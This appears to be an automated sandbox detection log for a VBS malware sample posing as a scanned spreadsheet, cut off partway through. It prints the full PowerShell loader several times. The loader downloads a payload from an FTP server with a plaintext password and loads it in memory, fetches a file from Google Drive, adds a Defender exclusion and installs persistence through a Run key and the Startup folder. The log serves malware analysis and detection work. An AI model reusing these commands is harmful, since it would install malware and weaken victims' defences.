'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6764, ParentProcessName: powershell.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1", ProcessId: 5424, ProcessName: powershell.exe
                    Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5424, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_vuw
                    Source: Process started, Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' 
, 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointM
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit, CommandLine: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit, ProcessId: 876, ProcessName: cmd.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' 
, 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointM
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 
'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6764, ParentProcessName: powershell.exe, ProcessCommandLine: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, ProcessId: 4924, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' 
, 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointM
Source: Registry Key set; Author: frack113, Florian Roth (Nextron Systems); Data: Details: cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5424, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_vuw
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' 
, 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointM
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs", ProcessId: 1492, ProcessName: wscript.exe
                    Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: cmd.exe /c mkdir "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\", CommandLine: cmd.exe /c mkdir "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object 
Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6764, ParentProcessName: powershell.exe, ProcessCommandLine: cmd.exe /c mkdir "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\", ProcessId: 6444, ProcessName: cmd.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'EQ' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + 'BY' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'B0' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'C8' + [char]65 + 'LwB3' + [char]65 + 'Hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + [char]65 + 'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65 + 'HM' + [char]65 + 'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + [char]65 + 'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'Gk' + [char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + 'dQBk' + [char]65 + 'GU' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'GM' + [char]65 + 'dQBz' + [char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + 'Gk' + [char]65 + 'egBl' + [char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + 'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBv' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 
+ '' + [char]65 + 'b' + [char]65 + 'Bs' + [char]65 + 'HU' + [char]65 + 'bg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gs' + [char]65 + 'bwB2' + [char]65 + 'G4' + [char]65 + 'SQ' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Ek' + [char]65 + 'VgBG' + [char]65 + 'HI' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bk' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'TQB0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'Jw' + [char]65 + 'x' + [char]65 + 'HM' + [char]65 + 'cwBh' + [char]65 + 'Gw' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'DM' + [char]65 + 'eQBy' + [char]65 + 'GE' + [char]65 + 'cgBi' + [char]65 + 'Gk' + [char]65 + 'T' + [char]65 + 'Bz' + [char]65 + 'HM' + [char]65 + 'YQBs' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'FQ' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 +
